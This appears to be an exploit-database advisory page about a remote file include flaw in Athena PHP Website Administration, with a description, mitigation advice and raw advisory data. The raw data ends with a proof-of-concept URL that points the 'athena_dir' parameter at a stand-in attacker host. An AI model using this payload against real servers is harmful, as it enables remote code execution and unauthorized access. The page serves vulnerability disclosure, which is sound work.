header-logo
Suggest Exploit
vendor:
Athena PHP Website Administration
by:
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Athena PHP Website Administration
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Athena PHP Website Administration Remote File Include Vulnerability

The Athena PHP Website Administration application is prone to a remote file include vulnerability. This vulnerability occurs due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this vulnerability by injecting a malicious URL as the value of the 'athena_dir' parameter in the 'athena.php' script. This allows the attacker to execute arbitrary remote PHP code on the affected system with the privileges of the web server process, potentially leading to unauthorized access.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user-supplied input before using it in any file inclusion or execution function. Additionally, keeping the application and server software up to date with the latest security patches and conducting regular security audits can help prevent such vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15574/info

Athena PHP Website Administration is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/path_to_athena/athena.php?athena_dir=http://[attacker_url]